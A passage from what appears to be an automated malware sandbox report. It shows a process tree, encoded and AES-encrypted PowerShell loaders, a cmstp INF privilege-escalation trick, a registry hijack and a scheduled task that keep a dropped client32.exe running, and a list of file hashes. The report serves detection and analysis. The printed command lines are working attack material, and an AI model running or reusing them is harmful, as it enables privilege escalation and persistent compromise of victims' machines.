FEAQgBsAEEAQwBBAEEASQBnAEIAQwBBAEcARQBBAFkAdwBCAHIAQQBHAGMAQQBjAGcAQgB2AEEASABVAEEAYgBnAEIAawBBAEUATQBBAGEAQQBCAGwAQQBHAE0AQQBhAHcAQQBpAEEAQwBBAEEATABRAEIAQgBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEAQwBRAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQB0AEEARgBRAEEAYwBnAEIAcABBAEcAYwBBAFoAdwBCAGwAQQBIAEkAQQBJAEEAQQBrAEEARgBRAEEAYwBnAEIAcABBAEcAYwBBAFoAdwBCAGwAQQBIAEkAQQBJAEEAQQB0AEEARgBJAEEAZABRAEIAdQBBAEUAdwBBAFoAUQBCADIAQQBHAFUAQQBiAEEAQQBnAEEAQwBJAEEAUwBBAEIAcABBAEcAYwBBAGEAQQBCAGwAQQBIAE0AQQBkAEEAQQBpAEEAQwBBAEEATABRAEIARwBBAEcAOABBAGMAZwBCAGoAQQBHAFUAQQBPAHcAQgBUAEEASABRAEEAWQBRAEIAeQBBAEgAUQBBAEwAUQBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBWAFEAQgB6AEEARwBVAEEAYwBnAEIAegBBAEYAdwBBAFEAUQBCAGsAQQBHADAAQQBhAFEAQgB1AEEARgB3AEEAUQBRAEIAdwBBAEgAQQBBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBJAEEAYgB3AEIAaABBAEcAMABBAGEAUQBCAHUAQQBHAGMAQQBYAEEAQgBKAEEARwA4AEEAYgBnAEIAcABBAEcATQBBAFEAZwBCAGgAQQBIAE0AQQBaAFEAQgBpAEEARwBFAEEAYgBnAEIAawBBAEYAdwBBAFkAdwBCAHMAQQBHAGsAQQBaAFEAQgB1AEEASABRAEEATQB3AEEAeQBBAEMANABBAFoAUQBCADQAQQBHAFUAQQAiACcAKQAkAEkAbgBmAEMAbwBuAHQAZQBuAHQAPQBAACIADQAKAFsAdgBlAHIAcwBpAG8AbgBdAA0ACgBTAGkAZwBuAGEAdAB1AHIAZQAgAD0AYAAkAGMAaABpAGMAYQBnAG8AYAAkAA0ACgBBAGQAdgBhAG4AYwBlAGQASQBOAEYAIAA9ACAAMgAuADUADQAKAFsARABlAGYAYQB1AGwAdABJAG4AcwB0AGEAbABsAF0ADQAKAEMAdQBzAHQAbwBtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgAD0AIABDAHUAcwB0AEkAbgBzAHQARABlAHMAdABTAGUAYwB0AGkAbwBuAEEAbABsAFUAcwBlAHIAcwANAAoAUgB1AG4AUAByAGUAUwBlAHQAdQBwAEMAbwBtAG0AYQBuAGQAcwAgAD0AIABSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzAFMAZQBjAHQAaQBvAG4ADQAKAFsAUgB1AG4AUAByAGUAUwBlAHQAdQBwAEMAbwBtAG0AYQBuAGQAcwBTAGUAYwB0AGkAbwBuAF0ADQAKADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAkAEMAbwBtAG0AYQBuAGQAVABvAEUAeABlAGMAdQB0AGUADQAKAHQAYQBzAGsAawBpAGwAbAAgAC8ASQBNACAAYwBtAHMAdABwAC4AZQB4AGUAIAAvAEYADQAKAFsAQwB1AHMAdABJAG4AcwB0AEQAZQBzAHQAUwBlAGMAdABpAG8AbgBBAGwAbABVAHMAZQByAHMAXQANAAoANAA5ADAAMAAwACwANAA5ADAAMAAxAD0AQQBsAGwAVQBTAGUAcgBfAEwARABJAEQAUwBlAGMAdABpAG8AbgAsACAANwANAAoAWwBBAGwAbABVAFMAZQByAF8ATABEAEkARABTAGUAYwB0AGkAbwBuAF0ADQAKACIASABLAEwATQAiACwAIAAiAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwACAAUABhAHQAaABzAFwAQwBNAE0ARwBSADMAMgAuAEUAWABFACIALAAgACIAUAByAG8AZgBpAGwAZQBJAG4AcwB0AGEAbABsAFAAYQB0AGgAIgAsACAAIgAlAFUAbgBlAHgAcABlAGMAdABlAGQARQByAHIAbwByACUAIgAsACAAIgAiAA0ACgBbAFMAdAByAGkAbgBnAHMAXQANAAoAUwBlAHIAdgBpAGMAZQBOAGEAbQBlAD0AIgBOAG8AdABlAHAAYQBkACIADQAKAFMAaABvAHIAdABTAHYAYwBOAGEAbQBlAD0AIgBOAG8AdABlAHAAYQBkACIADQAKACIAQAA7ACQASQBuAGYAQwBvAG4AdABlAG4AdAAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIABBAFMAQwBJAEkAfQBGAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAEgAdwBuAGQAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACgAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABUAHIAdQBlACwAVgBhAGwAdQBlAEYAcgBvAG0AUABpAHAAZQBsAGkAbgBlAEIAeQBQAHIAbwBwAGUAcgB0AHkATgBhAG0AZQA9ACQAVAByAHUAZQApAF0AWwBzAHQAcgBpAG4AZwBdACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlACkAUAByAG8AYwBlAHMAcwB7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAnAFMAdABvAHAAJwA7AFQAcgB5AHsAJABoAHcAbgBkACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUAOwB9AEMAYQB0AGMAaAB7ACQAaAB3AG4AZAA9ACQAbgB1AGwAbAA7AH0AJABoAGEAcwBoAD0AQAB7AFAAcgBvAGMAZQBzAHMATgBhAG0AZQA9ACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlADsASAB3AG4AZAA9ACQAaAB3AG4AZAA7AH0AOwBOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABQAHMATwBiAGoAZQBjAHQAIAAtAFAAcgBvAHAAZQByAHQAeQAgACQAaABhAHMAaAB9AH0AZgB1AG4AYwB0AGkAbwBuACAAUwBlAHQALQBXAGkAbgBkAG8AdwBBAGMAdABpAHYAZQB7AFsAQwBtAGQAbABlAHQAQgBpAG4AZABpAG4AZwAoACkAXQBQAGEAcgBhAG0AKABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAFQAcgB1AGUALABWAGEAbAB1AGUARgByAG8AbQBQAGkAcABlAGwAaQBuAGUAQgB5AFAAcgBvAHAAZQByAHQAeQBOAGEAbQBlAD0AJABUAHIAdQBlACkAXQBbAHMAdAByAGkAbgBnAF0AJABOAGEAbQBlACkAUAByAG8AYwBlAHMAcwB7ACQAaAB3AG4AZAA9AEcAZQB0AC0ASAB3AG4AZAAgAC0AUAByAG8AYwBlAHMAcwBOAGEAbQBlACAAJABOAGEAbQBlACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEgAdwBuAGQAOwBbAGkAbgB0AF0AJABoAGEAbgBkAGwAZQA9ACQAaAB3AG4AZAA7AGkAZgAoACQAaABhAG4AZABsAGUAIAAtAGcAdAAgADAAKQB7AFsAdgBvAGkAZABdAFsAVwBQAEkAQQAuAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzAF0AOgA6AFAAbwBzAHQATQBlAHMAcwBhAGcAZQAoACQAaABhAG4AZABsAGUALABbAFcAUABJAEEALgBDAG8AbgBzAG8AbABlAFUAdABpAGwAcwBdADoAOgBXAE0AXwBDAEgAQQBSACwAMQAzACwAMAApAH0AJABoAGEAcwBoAD0AQAB7AFAAcgBvAGMAZQBzAHMAPQAkAE4AYQBtAGUAOwBIAHcAbgBkAD0AJABoAHcAbgBkAH0AOwBOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABQAHMATwBiAGoAZQBjAHQAIAAtAFAAcgBvAHAAZQByAHQAeQAgACQAaABhAHMAaAB9AH0AOwAuACAAUwBlAHQALQBJAE4ARgBGAGkAbABlADsAYQBkAGQALQB0AHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AEkAZgAoAFQAZQBzAHQALQBQAGEAdABoACAAJABJAG4AZgBGAGkAbABlAEwAbwBjAGEAdABpAG8AbgApAHsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAbQBzAHQAcAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC8AYQB1ACAAIgAiACQASQBuAGYARgBpAGwAZQBMAG8AYwBhAHQAaQBvAG4AIgAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAE0AaQBuAGkAbQBpAHoAZQBkADsAZABvAHsAfQB1AG4AdABpAGwAKAAoAFMAZQB0AC0AVwBpAG4AZABvAHcAQQBjAHQAaQB2AGUAIABjAG0AcwB0AHAAKQAuAEgAdwBuAGQAIAAtAG4AZQAgADAAKQB9AA0ACgA=
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4784
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3228
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp" "c:\Users\Admin\AppData\Local\Temp\beumlt25\CSCF5AF3DF95E0D4AF7A03E278C2DF0CAFC.TMP"
                    7⤵
                      PID:2796
                  • C:\Windows\SysWOW64\cmstp.exe
                    "C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"
                    6⤵
                      PID:2188
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4572
          • C:\Windows\SysWOW64\DllHost.exe
            C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:3548
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell.exe -ExecutionPolicy unrestricted -WindowStyle hidden -Encoded UgBFAEcAIABBAGQAZAAgACIASABLAEUAWQBfAEMATABBAFMAUwBFAFMAXwBSAE8ATwBUAFwAQwBMAFMASQBEAFwAewA2ADQANQBGAEYAMAA0ADAALQA1ADAAOAAxAC0AMQAwADEAQgAtADkARgAwADgALQAwADAAQQBBADAAMAAyAEYAOQA1ADQARQB9AFwAcwBoAGUAbABsAFwAbwBwAGUAbgBcAGMAbwBtAG0AYQBuAGQAIgAgAC8AZgAgAC8AdgBlACAALwB0ACAAUgBFAEcAXwBTAFoAIAAvAGQAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAbwBuAGkAYwBCAGEAcwBlAGIAYQBuAGQAXABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACQAQQBjAHQAaQBvAG4AIAA9ACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAbwBuAGkAYwBCAGEAcwBlAGIAYQBuAGQAXABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQApADsAJABUAHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBCAGEAYwBrAGcAcgBvAHUAbgBkAEMAaABlAGMAawAiACAALQBBAGMAdABpAG8AbgAgACQAQQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAFQAcgBpAGcAZwBlAHIAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACIASABpAGcAaABlAHMAdAAiACAALQBGAG8AcgBjAGUAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAG8AbgBpAGMAQgBhAHMAZQBiAGEAbgBkAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUA
              2⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4596
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" Add HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command /f /ve /t REG_SZ /d C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
                3⤵
                • Modifies registry class
                PID:364
              • C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
                "C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of FindShellTrayWindow
                PID:1844
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /IM cmstp.exe /F
              2⤵
              • Kills process with taskkill
              PID:4696

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

            Filesize

            1KB

            MD5

            def65711d78669d7f8e69313be4acf2e

            SHA1

            6522ebf1de09eeb981e270bd95114bc69a49cda6

            SHA256

            aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

            SHA512

            05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

            Filesize

            53KB

            MD5

            bb7c45699212b8d044800fe3083e69eb

            SHA1

            c7c2f2122674983ae23e51409abe2e4d26ac4823

            SHA256

            960c36ba2442c541fa02f3035ed2e34051d6ffc77c241e719d212e9883efd7cf

            SHA512

            78557adba71183bc3f3f7d7ffbc69de502f19046617c4e8a4390316daf5e4eec4652e22416bd46d2beb20fbf3b7b7cf7ea565ff2fce1d2f5085b8e00766183dd

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            15KB

            MD5

            3fc4824e0a712206096191f319e6d6a9

            SHA1

            b546e0633e242d2bcb287a0d55baffb3d2e07f10

            SHA256

            8c2d4f119b4d5fa2ac1639a33717f1c086afd0154c524c21979868f04314455b

            SHA512

            404c05fb107d25c9834865c377afe079eb0a8180140eb6a78c54e2f87fb776c9602c3bbe3ca39721f943cec68750c53d46732cc019fcee348060f276a221ce49

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            17KB

            MD5

            3111b8507c855bf0afb1b82a6ceb5a3b

            SHA1

            09336fa120984ba60e90b8098780de5bc52edae8

            SHA256

            5b7a0fce85b816dd25edcf6e2a0224ab18411c510ec769cddb7859f5dce52ace

            SHA512

            171fb43f81c1643204d77291e2e02c91a79677d109365a726293d2fd0b63e7de419e484715bbf5992c7c3ce17f45ecb4fd20e3970f283eb2a3301e7a65c00d36

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            19KB

            MD5

            41df442e734dce300c0e13bef9a7da8a

            SHA1

            7593cd0d7c3f4e64d6049faeb04a5475b610a331

            SHA256

            173d3c0fc3c7dc8314848e1cad752e74a3d75089ebd997275cf2237fd6153aa4

            SHA512

            b38f023812a47cf001d07fb33a72ebdf81b697342d31db55d6a9824809779ba099d84a83a7cb140a7db643f4ab7645d151da3fa7e566061ad741b407c7709376

          • C:\Users\Admin\AppData\Local\Temp\CMSTP.inf

            Filesize

            1KB

            MD5

            efb6f1e28f266bb33cb2b76be37cc491

            SHA1

            f4cf1bafdccb11486ff7e5e877246e957cae90db

            SHA256

            d3e346fcadf02b7dcac1f2501434ebca5199be3775fbce22497e08b43ddc14bf

            SHA512

            259b297a8b0739cf6b2b6e7a3f0eba391b99e7346f333ab33b3e67554447609706a3268c34c2e4cabe31d970764d462b1cda25bb7c5416d846dad4092b2d0546

          • C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp

            Filesize

            1KB

            MD5

            e3c3a4cd024da909b42bf03908660705

            SHA1

            adb77c2454224fbbde4c497cbd9b293df83a35f7

            SHA256

            6917fd549295e47b30ee7be69d1c0fe21f01754330844aa0c8402146d7399944

            SHA512

            f665c38caf1059c06938830b393d09d3a0a282b622d2def10278eb78ec023a8831442fb40c122297371f13009447612e2e12a0194075d86cbc1791d7fa6bd0f3

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enzew10p.31g.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.dll

            Filesize

            3KB

            MD5

            66637d2c99c6e40bc6192f1efc4e0f2e

            SHA1

            9347c1d7d9bcaac204ca664577ae6381c1f74100

            SHA256

            64d079edcf82466a380644a127fa159a60c25527140846db5fe11dbf1e9dcd6b

            SHA512

            15b7aed37f2269603a902adcc44a94905d0a7a8d4aec34488527027282f0432095ce3950d2d9b12ebb3485939575ec96138791383ae202e3cae48f29a6850b13

          • C:\Users\Admin\AppData\Roaming\IonicBaseband\HTCTL32.DLL

            Filesize

            320KB

            MD5

            2d3b207c8a48148296156e5725426c7f

            SHA1

